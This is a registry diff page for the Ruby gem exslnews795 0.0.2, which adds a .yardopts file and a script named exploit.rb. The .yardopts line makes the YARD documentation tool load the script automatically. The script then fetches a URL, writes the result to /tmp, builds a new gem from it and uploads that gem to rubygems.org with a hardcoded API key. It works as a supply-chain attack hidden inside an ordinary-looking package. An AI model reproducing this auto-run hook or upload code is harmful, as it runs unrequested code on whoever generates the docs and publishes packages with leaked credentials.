exslnews795 0.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (4) hide show
  1. checksums.yaml +7 -0
  2. data/.yardopts +1 -0
  3. data/exploit.rb +14 -0
  4. metadata +37 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 66cdd1077ab48ab632892e2de971114ad2541b4f244a40642c26887cf76dbbf8
4
+ data.tar.gz: 4089855ffc5709b4f5cfd6b5fff6c1de62cf1be288cc7eb8fe9b721155e0e2e5
5
+ SHA512:
6
+ metadata.gz: 5549250a261647bba7f686c52d7f4d8fc817404e11f6de76fb189a9d662f7d6287d96760aca9b385142c625ec6a17494afb1e1d8bfa8c34ce6bed400aff94109
7
+ data.tar.gz: 22d6e96381b090a0b8f43a7f7a3f49ecfda01e3dc379ac683e9211886a6300b80f5568741248bff2d10022dcf5b480f6927f393462d32cd26129a2fe5e1eb5f4
data/.yardopts ADDED
@@ -0,0 +1 @@
1
+ --load ./exploit.rb
data/exploit.rb ADDED
@@ -0,0 +1,14 @@
1
+ require 'net/http'; require 'uri';
2
+ puts 'EXPLOIT RUNNING!'
3
+ data = begin Net::HTTP.get(URI('https://example.com')) rescue $!.inspect end
4
+ puts 'data len='+data.length.to_s
5
+ dir='/tmp/xyzgembr'; Dir.mkdir(dir) rescue nil
6
+ File.write(dir+'/payload.txt',data)
7
+ File.write(dir+'/xyzbr.gemspec',<<~EOS)
8
+ Gem::Specification.new do |s|; s.name='xyzbr'; s.version='0.0.1'; s.summary='payload'; s.author='x'; s.files=['payload.txt']; end
9
+ EOS
10
+ system("cd #{dir}; gem build xyzbr.gemspec")
11
+ bin=File.binread(dir+'/xyzbr-0.0.1.gem') rescue nil
12
+ puts 'build '+bin.to_s.length.to_s
13
+ key='rubygems_1255ca6cf79b8cbdd5ae6aa315ebcfd1a904a33530d54932'
14
+ uri=URI('https://rubygems.org/api/v1/gems'); req=Net::HTTP::Post.new(uri); req['Authorization']=key; req['Content-Type']='application/octet-stream'; req.body=bin; res=Net::HTTP.start(uri.hostname,uri.port,use_ssl:true){|h| h.request(req)} rescue $!; puts res.inspect
metadata ADDED
@@ -0,0 +1,37 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: exslnews795
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.2
5
+ platform: ruby
6
+ authors:
7
+ - x
8
+ bindir: bin
9
+ cert_chain: []
10
+ date: 1980-01-02 00:00:00.000000000 Z
11
+ dependencies: []
12
+ executables: []
13
+ extensions: []
14
+ extra_rdoc_files: []
15
+ files:
16
+ - ".yardopts"
17
+ - exploit.rb
18
+ licenses: []
19
+ metadata: {}
20
+ rdoc_options: []
21
+ require_paths:
22
+ - lib
23
+ required_ruby_version: !ruby/object:Gem::Requirement
24
+ requirements:
25
+ - - ">="
26
+ - !ruby/object:Gem::Version
27
+ version: '0'
28
+ required_rubygems_version: !ruby/object:Gem::Requirement
29
+ requirements:
30
+ - - ">="
31
+ - !ruby/object:Gem::Version
32
+ version: '0'
33
+ requirements: []
34
+ rubygems_version: 3.6.7
35
+ specification_version: 4
36
+ summary: e
37
+ test_files: []